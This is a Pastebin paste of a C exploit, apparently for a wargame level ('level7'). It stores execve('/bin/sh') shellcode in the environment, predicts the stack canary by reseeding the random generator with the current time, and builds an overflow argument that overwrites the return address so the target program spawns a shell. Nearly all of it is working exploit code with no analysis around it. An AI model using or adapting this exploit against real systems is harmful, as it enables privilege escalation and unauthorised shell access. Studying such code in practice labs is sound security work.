Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- //Target program
- char target_path[] = "/home/level7/level7";
- char target_name[] = "level7";
- //Shellcode to spawn a shell
- char *shellcode[] = {"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", (char *)0};
- int main(int argc, char *argv[])
- {
- char arg[85]; //Argument like {<prog> "<garbage[64]><canary[4]><garbage[12]><eip[4]>"}
- char canary[5]; //Canary in little-endian string
- char eip[5]; //Eip in little-endian string
- //Getting shellcode address in environment variable array *shellcode[]
- unsigned int shaddr = 0xbffffffc - (strlen(target_path)+1 + strlen(shellcode[0])+1);
- //Generate the random value based on system time
- srand(time(NULL));
- unsigned int r = random();
- //Convert canary and @shellcode into little-endian
- snprintf(canary, 5, "%c%c%c%c", (char)r&0x000000FF, (char)(r >> 8)&0x000000FF, (char)(r >> 16)&0x000000FF, (char)(r >> 24)&0x000000FF);
- snprintf(eip, 5, "%c%c%c%c", (char)shaddr&0x000000FF, (char)(shaddr >> 8)&0x000000FF, (char)(shaddr >> 16)&0x000000FF, (char)(shaddr >> 24)&0x000000FF);
- //Concat arg string
- snprintf(arg, 85, "----------------------------------------------------------------%s------------%s", canary, eip);
- //Debug info
- printf("Arg = %s\n", arg);
- printf("Canary = 0x%08X <-> %s\n", r, canary);
- printf("@sh = 0x%08x <-> eip = %s\n\n", shaddr, eip);
- //Exploit
- if(!execle(target_path, target_name, arg, (char *)0, shellcode))
- {
- perror("Unable to execute the target.\n");
- exit(1);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement